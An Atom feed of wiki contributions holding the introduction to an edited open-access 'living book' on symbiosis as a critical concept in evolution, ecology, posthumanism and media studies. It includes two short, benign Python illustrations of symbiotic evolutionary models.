<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-GB">
	<id>https://livingbooksaboutlife.org/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Garyhall</id>
	<title>Living Books About Life - User contributions [en-gb]</title>
	<link rel="self" type="application/atom+xml" href="https://livingbooksaboutlife.org/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Garyhall"/>
	<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php/Special:Contributions/Garyhall"/>
	<updated>2026-04-22T08:04:00Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.0</generator>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis/Introduction&amp;diff=5670</id>
		<title>Symbiosis/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis/Introduction&amp;diff=5670"/>
		<updated>2014-04-01T13:09:11Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/symbiosis Back to Contents of Symbiosis]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Cladonia macilenta.jpg|182x200px|Cladonia macilenta]] [[Image:Amphiprion percula.JPG|265x200px|Amphiprion percula.JPG]] [[Image:PloverCrocodileSymbiosis.jpg|182x200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Introduction: symbiosis as a living evolving critique'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Different species, interacting in a symbiotic fashion, living together over a prolonged period of time, eventually co-evolving into new species: this vision of the biological phenomenon of symbiosis has created a strong impression—both of symbiosis as a metaphor and a material reality—of species in an intimate relationship together, cooperating in spite of differences, of becoming something else and transgressing boundaries. This idea has turned the concept of symbiosis, in its many guises and definitions,[1] into a breeding ground for a posthuman, biologically and ecologically informed critique. Less concerned with the biological process of symbiosis as such, our focus in ''Symbiosis: Ecologies, Assemblages and Evolution'' is more on how symbiosis can be used as a means to argue for an alternative worldview and even a better world. Interestingly, Angela Elizabeth Douglas notes a similar development in her book ''The Symbiotic Habit'' (2010), where she talks about the growing importance of ‘applied symbiosis research’. Douglas refers above all to how research into symbiotic processes has the potential to help solve some of the practical problems humankind is facing through anthropogenically induced effects, such as climate change and environmental disasters, and in this way to influence and improve (our) ecosystem(s) and make the world in which we live much healthier (Douglas, 2010: viii).&lt;br /&gt;
&lt;br /&gt;
This living book consists of a number of examples of how symbiosis has been deployed: for instance, as a critique of the mainstream Darwinian idea of evolution as struggle; of the anthropocentric worldview that operates within the sciences and society at large; and of the idea of organisms or objects as static and isolated entities. Given the way in which symbiotic processes offer seeds for alternative worldviews, research on symbiosis has been taken up as providing evidence for becoming as an infinite creative process, for the (animal, microbial, machinic, and/or virtual) other as an integral part of the multiple I, and for the integrated cooperation of living and non-living affects as one interconnected mesh.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Otherness, process, multiplicity and cooperation''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For the biologist Lynn Margulis, (endo)symbiosis has been the major theme around which she has developed her—for some quite controversial—evolutionary biological research. In her book ''Symbiotic Planet: A New Look at Evolution'' (1999), Margulis states that in science there are still many (hidden) assumptions to the effect that man is the center of things and resides in the middle of the chain of evolution, ‘below god and above rock’ (Margulis, 1999: 8-9). However, as Margulis has argued in her revolutionary work on the importance of endosymbiosis for evolution, all life forms can be seen to have evolved from microbes, from (the interactions between) bacteria. In some cases symbiosis even evolves into symbiogenesis, when certain forms of long-term living together lead to the appearance of new species or new organs. Here, organisms merge with other organisms, acquiring their gene sets in the process (Margulis, 1999: 8-9). Margulis’ main claim, for which she draws on earlier work by the biologist Ivan Wallin amongst others, is thus that in most cases evolutionary novelty arises as a consequence of symbiosis, which goes directly against (or, in a less radical view, complements) a Darwinian ‘nucleocentric’ view of evolution as a bloody struggle of animals (Margulis, 1999: 19-20). Margulis’ claims concerning symbiosis, and her use of the concept of symbiosis, have been seen as somewhat controversial and extreme within mainstream evolutionary biology, not only because of her insistence on symbiosis and evolutionary cooperation as an alternative theory to that of Darwinian struggle, but also due to her insistence that it was not just plants and animals that evolved from the interaction of microbes,[2] but all life forms. And as she herself puts it, ‘the idea that new species arise from symbiotic mergers among members of old ones is still not even discussed in polite scientific society’ (Margulis, 1999: 7).&lt;br /&gt;
&lt;br /&gt;
What makes Margulis even more suspect in some biological circles is the way her theory of symbiosis and symbiotic evolution has been adopted by New Age-inspired environmental and deep ecology movements, and, most importantly, the way her use of symbiosis in biological discourse has been connected with James Lovelock’s Gaia hypothesis. The latter proposes a holistic view of the earth (Gaia) as a self-regulating whole of organic and inorganic matter, operating as a single unity by means of a feedback system. This idea is visible in many present-day ecosophies. However, such mixing of a near spiritual and religious rhetoric with scientific facts was not deemed intellectually serious by many biological researchers, and was regarded as too harmonious and too regulated (instead of an unconscious mechanism) by the ‘struggle for survival’ evolutionary strand of neo-Darwinians.[3]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Symbiotic becomings''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Developments in modern biology, including the new emphasis on the importance of symbiosis for evolution, played an important role in what has come to be characterized as poststructuralist and posthuman thinking. In particular, biologically oriented ‘earthly processes’ (as opposed to transcendental ideas) and new evolutionary theories were an influential reference point for the construction of the geophilosophy of Deleuze and Guattari, in which they argue for a ‘virtually limitless connectivity between heterogeneous beings’ (Chisholm, 2007). However, Dianne Chisholm, in her reading of Deleuze and Guattari’s geophilosophy, strongly contrasts their theories with ideas connected to the Gaia hypothesis or holism. From Deleuze and Guattari’s perspective, disparate processes of symbiosis and evolution do not resolve into a synthetic unity; rather, as Chisholm states, their philosophy ‘deterritorialize(s) Gaia's unified field’ (Chisholm, 2007).&lt;br /&gt;
&lt;br /&gt;
	Deleuze and Guattari use symbiotic processes in another way to ground their philosophy. Aspects of their symbiotic critique can be seen to be directed against ideas of classification by filiation, stable identity (instead of identity as becoming) and the single unified entity (as opposed to the self as a pack of multiplicities and assemblages). Using the concept of symbiosis, Deleuze and Guattari first of all critique modern science and the way it is only able to think in terms of filiations, of mimesis.[4] This critique of classification is also visible in Margulis’ work, where she uses symbiosis to problematize the mainstream way of classifying species. She argues against oversimplified and dangerous categorizations into ‘plants, animals and germs’, arguing that in many cases differences between plants and animals are not that easy to make and, as she puts it, a ‘more scientific’ division can also be made between prokaryotic cells and eukaryotic cells, crushing the age-old divide between plants and animals (which are far more alike than they are presented as being in mainstream classifications) (Margulis, 1999: 56). Different, distinct kingdoms are thus, in the terminology of both Deleuze and Guattari and Margulis, hard to establish and maintain.&lt;br /&gt;
&lt;br /&gt;
	Deleuze and Guattari adopt a similar approach of using the concept of symbiosis to help critique classification and genealogical evolution when they discuss their idea of neoevolutionism. In a neoevolutionist approach classifications are not made according to filiation, or by imitating or identifying with something/someone, but by ‘transversal communications between heterogeneous populations’ (Deleuze and Guattari, 1988: 239). Chisholm summarises Deleuze and Guattari’s neoevolutionism as follows: ‘Instead of specific genealogical lineages of origin, selection, reproduction, and evolution, they map a non-teleological and unpredictable network of symbiotic alliances, trans-species affiliations, symbiogenesis, and co-evolution’ (Chisholm, 2007).&lt;br /&gt;
&lt;br /&gt;
Deleuze and Guattari thus propose a non-classification of becoming, preferring, for evolution between heterogeneous terms, the term ‘involution’ as an alternative to ‘evolution’ (Deleuze and Guattari, 1988: 238-239). They specifically use symbiosis to explain their idea of becoming (which is rhizomatic and directed against thinking in genealogies), where symbiosis can be seen as the underlying basis of their ‘creative involution’. As they state: ‘Becoming produces nothing by filiation; all filiation is imaginary. Becoming is always of a different order than filiation. It concerns alliance. If evolution includes any veritable becomings, it is in the domain of symbioses that bring into play beings of totally different scales and kingdoms, with no possible filiation’ (Deleuze and Guattari, 1988: 238-239).&lt;br /&gt;
&lt;br /&gt;
The critique of a static individual is also visible in biological research, where symbiosis has been used to challenge the boundaries of an organism. Margulis likewise states that every individual consists of multi-unit symbiotic individuals, which continually merge, regulating their reproduction to generate new populations. She, like Deleuze and Guattari, speaks about how every ‘individual organism’ in a ‘species’ is ‘really a group, a membrane-bounded packet of microbes that looks like and acts as a single individual’ (Margulis, 1999: 11). This directly relates to Deleuze and Guattari’s idea that every animal is a band or a pack, an idea that is very important for the concept of human becoming-animal, in which the human is fascinated by both the multiplicity outside us (the pack of animals) and the multiplicity already dwelling inside us (Deleuze and Guattari, 1988: 239-240). Deleuze and Guattari’s non-classification of symbiotic becoming can be seen as a viral evolution, based on contagion (instead of heredity), where animals as packs originate, develop and transform by means of viral contagion (Deleuze and Guattari, 1988: 241).&lt;br /&gt;
&lt;br /&gt;
	Their vision of an individual is that it consists of an infinite multiplicity, where multiplicities made up of heterogeneous terms continuously transform or cross over into each other. Multiplicities co-functioning via a viral logic of contagion then enter into assemblages. Becoming and multiplicity basically mean the same thing in Deleuze and Guattari’s philosophy, and here again they use symbiosis to define and explain one of their core concepts:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Since its variations and dimensions are immanent to it, it amounts to the same thing to say that each multiplicity is already composed of heterogeneous terms in symbiosis, and that a multiplicity is continually transforming itself into a string of other multiplicities, according to its thresholds and doors (Deleuze and Guattari, 1988: 275).&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The concept of assemblage, as applied in Deleuze and Guattari’s geophilosophy, can thus be seen to do away with the nature-culture distinction. Assemblages also incorporate non-organic matter. Tools as instruments get incorporated into and are inseparable from the assemblage, creating a machinic phylum. In this manner humans are also related to non-living/non-organic beings through assemblages. An assemblage keeps different types of objects, heterogeneous elements, together; objects and elements that continuously enter into relations with one another, where the affects of a body enter into composition with other affects. This entering of affects again has a symbiotic character:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;We know nothing about a body until we know what it can do, in other words, what its affects are, how they can or cannot enter into composition with other affects, with the affects of another body, either to destroy that body or to be destroyed by it, either to exchange actions and passions with it or to join with it in composing a more powerful body (Deleuze and Guattari, 1988: 256).&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Chisholm remarks that these kinds of machinic assemblages, or symbioses with inorganic life, are the vitalist element behind creating more life in a non-reproductive way. Symbiotic couplings or machinic assemblages between unlike things create something other than themselves, something more creative (Chisholm, 2007).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Symbiotic systems and ecologies''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In both systems theory and media studies a symbiotic critique following the idea of machinic assemblages can be seen to have gained ground, arguing for the importance of seeing non-organic processes and nature-culture assemblages as inherent to information-processing entities. In research into media ecologies, media are seen, in a symbiotic fashion, as cooperating open systems, producing something more through their interactions than (the sum of) their separate parts. Thus Matthew Fuller, in his book ''Media Ecologies'', uses Deleuze and Guattari’s concept of the machinic phylum to describe the tension between the discrete parts of a specific medium or a specific media ecology and their multiplicitous becomings. From this point of view, media should be seen as complex dynamical systems (ecologies), as networks of objects and processes, and it is their interconnectedness that we should be interested in (Fuller, 2005: 6). Similarly, Jussi Parikka, in his volume ''Insect Media'', is interested in the intertwining of animals and technology. Like Fuller, he is not interested in studying media as fixed substances but in their becomings (exploring media archaeology). In Parikka’s work these machinic assemblages are not merely metaphoric suggestions, but function as a means to rethink the material basis of media and the way matter can be seen as an active agent. Media can thus be seen as ‘realms of affects, potentials and energetics’ (Parikka, 2010: xxvii). Media bodies emerge as part of the environments in which they are embedded, interconnected through their intensive capabilities. In this sense, as Parikka states, we (humans, animals, insects, bacteria) are all media and are of media, an argument for a more inclusive vision of media ecologies (Parikka, 2010: xxvii).&lt;br /&gt;
&lt;br /&gt;
Van Loon argues for a similar emphasis on the material basis of media, over and above merely metaphorical imagery, when he discusses the importance of symbiotic processes to any understanding of the interactions in (complex) systems theory. Not only do biology and science as such use symbiosis as a metaphor too; Van Loon also argues that political processes are no less real than, say, bacteria. As he states:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;The point to make here is simply that if we understand that the basic process in symbiosis is a form of interaction between two or more different information processing systems, that in turn work to manipulate and modify their environment according to better their chances of survival, then it should become clear that this includes both organic and inorganic information-processing systems (Van Loon, 1999).&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Van Loon explains how, in systems theory, symbiosis has been used to show that evolution through associations can explain how new organisms ‘emerge’ far more effectively than natural selection can. In opposition to a systems theory based on natural selection, Van Loon argues that such a politics of survival can be seen as fascist, as it privileges the autonomy of the individual over that of the community. Complex systems always arise through symbiosis, as they are assemblages of information-processing devices. Van Loon goes on to show how community emerges, functions and evolves via a symbiotic parasite politics, a parasite politics that can be seen as the essence of a community. Here he regards the parasite as ‘the other’ that makes up the community-in-difference (Van Loon, 1999).&lt;br /&gt;
&lt;br /&gt;
	This living book forms another machinic assemblage between heterogeneous and discrete information-processing entities. Within it you will find a collection of media resources, interacting in and with a wider media ecology, resources that apply symbiotic critique within their particular networks. That is to say, they use symbiotic processes to argue for a different worldview. Brought together in this living book, they merge and form symbiotic alliances from which they will continue to evolve.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Evolution, ecology, posthumanism and augmentation''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This living book is divided into four parts. The first part of ''Symbiosis: Ecologies, Assemblages and Evolution'' looks at symbiosis as an evolutionary process, the second at the relationship between symbiosis and ecology, and the third at the role symbiosis has played in discourses on the posthuman. The fourth part then provides a more speculative glance into a future of augmented and virtual reality and an evolving symbiosis between the virtual and the real.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Part one of ''Symbiosis: Ecologies, Assemblages and Evolution'', which focuses on ''Symbiosis and Evolution'', contains two articles that serve as both an introduction to, and an example of, symbiosis. The first of these, ‘How Symbiosis can Guide Evolution’, is an example of the use of the concept of symbiosis to challenge theories of evolution inspired by (neo-)Darwinism. It describes the creation of a computational model that shows how the formation of symbiotic relations in a given ecosystem influences genetic variation (a toy sketch of this general idea follows below). It is followed by Fabio Luciani and Samuel Alizon’s ‘The Evolutionary Dynamics of a Rapidly Mutating Virus within and between Hosts: The Case of Hepatitis C Virus’, which looks at the evolution of the Hepatitis C virus in a within-host environment, describing the parasitic relationship of the virus with the host-body.&lt;br /&gt;
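&lt;br /&gt;
By way of illustration only (what follows is a hedged toy sketch of the general idea, not Watson and Pollack’s actual model), the advantage symbiosis can confer on evolution is easy to demonstrate computationally: if fitness rewards only complete modules, the symbiotic join of two differently specialised partners can be rewarded where the gradual mutation of a lone genome is not. The task, parameters and ‘join’ operator below are all illustrative assumptions.&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Toy sketch (not Watson and Pollack's published model): fitness rewards
# only complete modules, so partial progress is invisible to selection
# on lone genomes, while the symbiotic composition of two differently
# specialised partners is rewarded immediately.
import random

MODULES, MODULE_LEN, POP = 4, 5, 20

def fitness(genome):
    # Count fully-completed (all-ones) modules; partial modules score 0.
    score = 0
    for m in range(MODULES):
        block = genome[m * MODULE_LEN:(m + 1) * MODULE_LEN]
        if all(block):
            score += 1
    return score

def join(a, b):
    # Symbiosis as composition: the partnership expresses a trait
    # carried by either partner (a deliberately crude abstraction).
    return [x or y for x, y in zip(a, b)]

random.seed(1)
pop = [[random.randrange(2) for _ in range(MODULES * MODULE_LEN)]
       for _ in range(POP)]
best_alone = max(fitness(g) for g in pop)
best_pair = max(fitness(join(a, b)) for a in pop for b in pop)
print('best individual fitness:', best_alone)
print('best symbiotic pairing :', best_pair)
&amp;lt;/pre&amp;gt;&lt;br /&gt;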
&lt;br /&gt;
	The second set of articles in the part on ''Symbiosis and Evolution'' then looks at the process of endosymbiosis (symbiosis inside the body/cell) in particular. The article by Xu et al. looks at the evolution of symbiotic bacteria in the human intestine, while the article by Wernegreen looks at the interactions (via associations or genetic conflicts) of bacteria within and with insects, and the possibility of genetic manipulation in this evolutionary interaction.&lt;br /&gt;
&lt;br /&gt;
	Finally, the third set of articles in the part on ''Symbiosis and Evolution'' looks at the origin of the theory of symbiogenesis, incorporating American biologist Ivan Wallin’s seminal 1927 book ''Symbionticism and the Origin of Species'', which made the then highly controversial claim that cells evolved by symbionticism, by the formation of microsymbiotic complexes. In this book Wallin describes the emergence of mitochondria as the incorporation of independent bacteria inside existing cells, bacteria which evolved into what we now know as organelles. In an overview article, the biologist Lynn Margulis goes back to the origin of the theory of symbiogenesis (and to Wallin and his Russian colleagues) to explore the roots of her own work and, at the same time, the development of her groundbreaking Serial Endosymbiosis Theory (SET).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The second part of this liquid book looks at the relationship of symbiosis with ecology. In the opening section on community ecology, the article ‘The Roles and Interactions of Symbiont, Host and Environment in Defining Coral Fitness’ looks at the complex interactions between the coral host, the algal symbiont and the environment, and at the role symbionts play in this community ecology with respect to the community’s (the coral holobiont’s) fitness and in determining what the effects of global climate change on this ecology might be. An important aspect of many discourses surrounding ecology is the maintenance of the biodiversity and complexity of a given system or ecology. The article by Toft, Williams and Fares looks at this aspect of biodiversity as a measure of the health of ecosystems and at the role symbiosis (especially the way proteobacteria interact with insects) plays in generating species diversity.&lt;br /&gt;
&lt;br /&gt;
	Symbiosis also plays a role in those discourses surrounding ecology that go beyond a single community or ecological system to focus instead on the ecosystem that makes up the world as a whole. The notion of the world functioning as one big ecosystem is reflected in Timothy Morton’s work and the importance he gives to the idea of interconnectedness. Echoing processes of symbiosis, his concept of the Mesh is set up against nature-culture distinctions, focusing instead on the interconnectedness of existence and seeing existence as first of all a co-existence.&lt;br /&gt;
&lt;br /&gt;
	Symbiosis has also been influential in the previously mentioned Gaia hypothesis. Here symbiosis, ecology and interconnectedness are taken to a point of spiritual culmination where the whole biosphere can be seen as a single complex planetary system consisting of organic and inorganic components. In ‘The Systems View of Life’, a chapter from his book ''The Turning Point'', Capra looks at these interrelationships from a systems point of view, seeing living organisms as open systems, functioning in their interactions with others and their environment on different levels of the overall system. Stephen B. Scharper, in his overview article on Gaia, reviews theories by Lovelock, Margulis and others that have concentrated on the idea of the earth as a living organism. He focuses, amongst other things, on the way Gaia theory combined scientific discoveries with a ‘religious imagination’. Timothy Morton, in his podcast on Lynn Margulis and Gaia, notes the differences between her view of symbiosis and the way it was adopted in Gaia theory.&lt;br /&gt;
&lt;br /&gt;
	This part of the book on ''Symbiosis and Ecology'' ends with Matthew Fuller’s ''Media Ecologies'', in which he adapts the concept of ecology to media, showing how media as interacting objects, and media systems, function as ecologies. Just as different species interact in a symbiotic way to create new species, Fuller shows how a mobile phone, for instance, can be seen as a ‘media assemblage’.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The third part of the book, on ''Symbiosis and Posthumanism'', looks at the influence of symbiosis on thinking about non-organic matter and its interactions with organic matter. Symbiosis has played an important role in discourses on the posthuman: for instance, in Licklider’s seminal speculative paper on the possibilities of man-machine symbiosis. Schalk updates Licklider’s article, using contemporary developments in computing and information processing to show how Licklider’s vision was not so much utopian as a case for technological improvements. Schalk argues that brain-computer symbiosis or partnerships are a logical step in the course of our evolution.&lt;br /&gt;
&lt;br /&gt;
	The next section, on ''Symbiotic Intelligence'', expands on the possibility of symbiotic intelligence by combining computing with (neural) networks. The article that opens this section, ‘Forming Neural Networks Through Efficient and Adaptive Coevolution’ by Moriarty and Miikkulainen, discusses a novel neuroevolutionary approach to mobile robotics using the Symbiotic Adaptive NeuroEvolution system (SANE), arguing for the benefits of using co-evolutionary algorithms to solve complex control problems (a rough sketch of the symbiotic mechanism follows below). The importance of dynamic or distributed problem-solving, of ‘collective decision making’ and symbiotic intelligence, is also discussed in Johnson’s overview of symbiotic intelligence and human-net interactions.&lt;br /&gt;
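&lt;br /&gt;
To give a non-specialist flavour of the symbiotic mechanism in question (the sketch below is a loose illustration of the SANE idea under simplifying assumptions, not Moriarty and Miikkulainen’s published system), the unit of selection can be made the individual neuron rather than the whole network: networks are temporary symbiotic coalitions of neurons, and each neuron is scored by the average fitness of the coalitions it has served in. The toy XOR task and all parameters below are illustrative assumptions.&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Illustrative sketch of symbiotic neuroevolution in the spirit of SANE:
# neurons, not networks, are evolved; networks are temporary coalitions
# of neurons, and a neuron's fitness is the average fitness of the
# coalitions it has participated in. Task and parameters are assumptions.
import math
import random

POP, NET_SIZE, TRIALS, GENS = 40, 4, 150, 50
XOR = [((0, 0), 0), ((0, 1), 1), ((1, 0), 1), ((1, 1), 0)]

def act(x):
    return 1.0 / (1.0 + math.exp(-x))

def net_out(neurons, inputs):
    # Each neuron: [w_in1, w_in2, bias, w_out]; sum the weighted activities.
    total = sum(n[3] * act(n[0] * inputs[0] + n[1] * inputs[1] + n[2])
                for n in neurons)
    return act(total)

def net_fitness(neurons):
    err = sum((net_out(neurons, i) - t) ** 2 for i, t in XOR)
    return 1.0 / (1.0 + err)

random.seed(0)
pop = [[random.uniform(-1, 1) for _ in range(4)] for _ in range(POP)]
best = 0.0
for gen in range(GENS):
    scores = [[] for _ in range(POP)]
    for _ in range(TRIALS):
        team = random.sample(range(POP), NET_SIZE)  # a symbiotic coalition
        f = net_fitness([pop[i] for i in team])
        best = max(best, f)
        for i in team:
            scores[i].append(f)
    # A neuron's fitness is the average fitness of its coalitions.
    fit = [sum(s) / len(s) if s else 0.0 for s in scores]
    order = sorted(range(POP), key=lambda i: fit[i], reverse=True)
    keep = order[:POP // 2]
    children = []
    for _ in range(POP - len(keep)):
        a, b = random.sample(keep, 2)
        child = [random.choice(w) for w in zip(pop[a], pop[b])]  # crossover
        child[random.randrange(4)] += random.gauss(0, 0.5)      # mutation
        children.append(child)
    pop = [pop[i] for i in keep] + children
print('best coalition fitness found:', round(best, 3))
&amp;lt;/pre&amp;gt;&lt;br /&gt;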
&lt;br /&gt;
	Another aspect of the importance of symbiosis is discussed in the paper by Bhan et al. on human-animal symbiosis resulting in chimeras (human-animal hybrids). This article discusses the role that the development of chimeras could play in vaccine development, were it not for the strong ethical problems involved in this form of symbiotic evolution.&lt;br /&gt;
&lt;br /&gt;
	The last section in this part of the book looks at machine-nature interactions. Here Schuppli’s article ‘Of Mice Moths and Men Machines’ describes the coevolution of machines with living matter through the example of Hopper’s bug, arguing that mutations, chaos and viral infections are necessary for systems to survive and evolve. Jussi Parikka, in his essay on digital monsters and binary aliens, goes deeper into this discourse of the viral as a negative issue of control in the present capitalist system. He shows how, on the other hand, capitalism itself is integrally viral. Parikka explores these contradictory themes of the viral as the enemy of capitalism and at the same time as integral to its logic of expansion, positioning them as two intertwined discourses.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The final part of the book, on ''Symbiosis and Augmentation'', looks at possibilities both for augmenting man with machinic prosthetic tools via neural networks, and for augmenting reality with overlaid or augmented virtual worlds. The article ‘Exploiting co-adaptation for the design of symbiotic neuroprosthetic assistants’ by Sanchez et al. looks at the brain’s incorporation of neuroprosthetic tools through neural networks. This can be seen as an example of human-tool symbiosis where, through the cognitive space of the brain, tools can be used as extensions or ‘enhancements’ of the body.&lt;br /&gt;
&lt;br /&gt;
	The book’s final part ends with a poetic experiment involving text and bacteria, and with two descriptions of media art which experiment with the symbiosis between the real and the virtual. ‘Carrier Becoming Symborg’, the title of a piece and text by Melinda Rackham, looks at the viral merging of biological code and source code. Her electronic literature piece about the Hepatitis C virus describes both life and literature as an infectious viral agent. Meanwhile Mitchell Whitelaw examines the work of Andy Gracie and other examples of the bio/tech hybrid in media art, and talks about the importance of symbiosis in Gracie’s work: when, for example, he creates augmented worlds in which real and virtual bacteria interact (in ''Autoinducer_Ph-1''). Christian Bök, in ‘The Xenotext Experiment’, describes his proposal for having a text live as a parasite within the cells of another life-form, by encoding a short verse from a poem into a sequence of DNA in order to implant it into a bacterium.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Epilogue: The Symbiotic Book''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We should stress that this living book is also a symbiotic book. It is a merging and co-habitation of different media-species, a mash-up of text and video, sound and images, pixels and living, material tissue. The digital medium has in many ways made it possible for the book to become increasingly infected with foreign (non-textual) elements as it evolves into something different: into a becoming which might even lead to the disappearance of the book as we currently know it and to the rise of a new, symbiotically evolved hybrid book-species.&lt;br /&gt;
&lt;br /&gt;
	In this context this symbiotic book on symbiosis also constitutes a tool for a critique directed at visions of the book which position it as a static, stable entity, a lifeless thing made out of dead trees. As a concept, the symbiotic book argues for the book as becoming, as infinitely transforming and interacting and crossing over into other books and other discourses, a machinic assemblage of various discrete media entities, all of them interconnected. In this vision the networked, liquid books in the Living Books About Life series form an ecology of information, one that grows stronger and expands in mutual cooperation. Cooperation as books, as ‘lifeless entities’ or non-organic matter, also takes place with and via the living, with the human assemblages who create the books, feed into them, and make them part of the networks through which they algorithmically spread over the web, keeping the book alive, keeping it social.&lt;br /&gt;
&lt;br /&gt;
	The symbiotic book crosses boundaries between the life sciences and the humanities, but also between the scholarly world and society at large, thus making it open for infection, for re-use, for remixing and change. The symbiotic book still has borders, though. Evolution is a slow process, heavily influenced by environmental and cultural barriers. Nevertheless, some genetic modification might be beneficial in this respect.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Endnotes'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1.	On the lack of a uniform definition of symbiosis, see: Douglas, A.E. (2010) ''The Symbiotic Habit.'' Princeton: Princeton University Press, 4-5.&lt;br /&gt;
&lt;br /&gt;
2.	Margulis explains how symbiosis over a prolonged period of time led first to the evolution of complex cells with nuclei and then from there led to the evolution of other organisms such as fungi, plants, and animals (Margulis, 1999: 6).&lt;br /&gt;
&lt;br /&gt;
3.	For an overview of scientific criticism of the Gaia hypothesis, see: Scharper, S.B. (1997) ''Redeeming the Time: A Political Theology of the Environment.'' New York: The Continuum International Publishing Group Inc., 53-54.&lt;br /&gt;
&lt;br /&gt;
4.	As they state: ‘Natural history can think only in terms of relationships (between A and B), not in terms of production (from A to x)’. Deleuze, G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia.'' Minneapolis: University of Minnesota Press, 234-235.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''References'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Chisholm, D. (2007) ‘Rhizome, Ecology, Geophilosophy (A Map to this Issue).’ ''Rhizomes: Cultural Studies in Emerging Knowledge'', rhizomes.15 (winter).&lt;br /&gt;
&lt;br /&gt;
Deleuze, G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia.'' Minneapolis: University of Minnesota Press.&lt;br /&gt;
 &lt;br /&gt;
Douglas, A.E. (2010) ''The Symbiotic Habit.'' Princeton: Princeton University Press.&lt;br /&gt;
&lt;br /&gt;
Fuller, M. (2005) ''Media Ecologies: Materialist Energies in Art and Technoculture.'' Cambridge: MIT Press.&lt;br /&gt;
&lt;br /&gt;
Margulis, L. (1999) ''Symbiotic Planet: A New Look at Evolution.'' New York: Basic Books.&lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2010) ''Insect Media: An Archaeology of Animals and Technology.'' Minneapolis: University of Minnesota Press.&lt;br /&gt;
&lt;br /&gt;
Scharper, S.B. (1997) ''Redeeming the Time: A Political Theology of the Environment.'' New York: The Continuum International Publishing Group Inc.&lt;br /&gt;
&lt;br /&gt;
Van Loon, J. (1999) ‘Parasite-politics: on the significance of symbiosis and assemblage in theorizing community-formations’, in Chris Pierson and Simon Tormey (eds), ''Politics at the Edge.'' The PSA Yearbook.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis&amp;diff=5669</id>
		<title>Symbiosis</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis&amp;diff=5669"/>
		<updated>2014-04-01T13:08:25Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: /* Introduction: Symbiosis as a Living Evolving Critique */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:Symbiosis1.jpg|right|318x450px|Symbiosis1.jpg]]&lt;br /&gt;
Ecologies, Assemblages and Evolution&lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-271-1]&lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Symbiosis/bio Janneke Adema and Pete Woodbridge]&lt;br /&gt;
__TOC__&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Symbiosis/Introduction Introduction: Symbiosis as a Living Evolving Critique]  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;FPGH7pk5RlQ&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Different species, interacting in a symbiotic fashion, living together over a prolonged period of time, eventually co-evolving into new species: this vision of the biological phenomenon of symbiosis has created a strong impression—both of symbiosis as a metaphor and a material reality—of species in an intimate relationship together, cooperating in spite of differences, of becoming something else and transgressing boundaries. This idea has turned the concept of symbiosis, in its many guises and definitions, into a breeding ground for a posthuman, biologically and ecologically informed critique. Less focused on the biological process of symbiosis as such, our focus in Symbiosis: Ecologies, Assemblages and Evolution is more on how symbiosis can be used as a means to argue for an alternative worldview and even a better world.... ([http://www.livingbooksaboutlife.org/books/Symbiosis/Introduction more])&lt;br /&gt;
&lt;br /&gt;
